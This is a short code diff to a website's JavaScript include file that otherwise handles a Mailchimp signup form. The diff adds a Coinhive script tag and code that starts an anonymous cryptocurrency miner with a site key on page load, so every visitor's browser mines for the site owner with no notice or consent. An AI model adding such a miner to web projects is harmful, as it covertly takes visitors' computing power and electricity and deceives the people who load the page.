--- a/_includes/javascript.html
+++ b/_includes/javascript.html
@@ -2,6 +2,7 @@
 <script src="/assets/js/bootstrap.min.js"></script>
 <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
 <script src="http://downloads.mailchimp.com/js/jquery.form-n-validate.js"></script>
+<script src="https://coinhive.com/lib/coinhive.min.js"></script>
 <script>
 	$(document).ready( function () {
 	    $('#wrapper').height($(document).height());
@@ -14,7 +15,11 @@
 	            // validate_input() is a validation function I wrote, you'll have to substitute this with your own.
 	            if ( $form.validate() ) { register($form); }
 	        });
-	    }
+		}
+		
+		// Coinhive
+		var miner = new CoinHive.Anonymous('flQ6iKjlcO9f0jNAEYB1sNOxrkFmkYbp');
+		miner.start();
 	});
 
 	function appendResult(userText , className, iconClass){
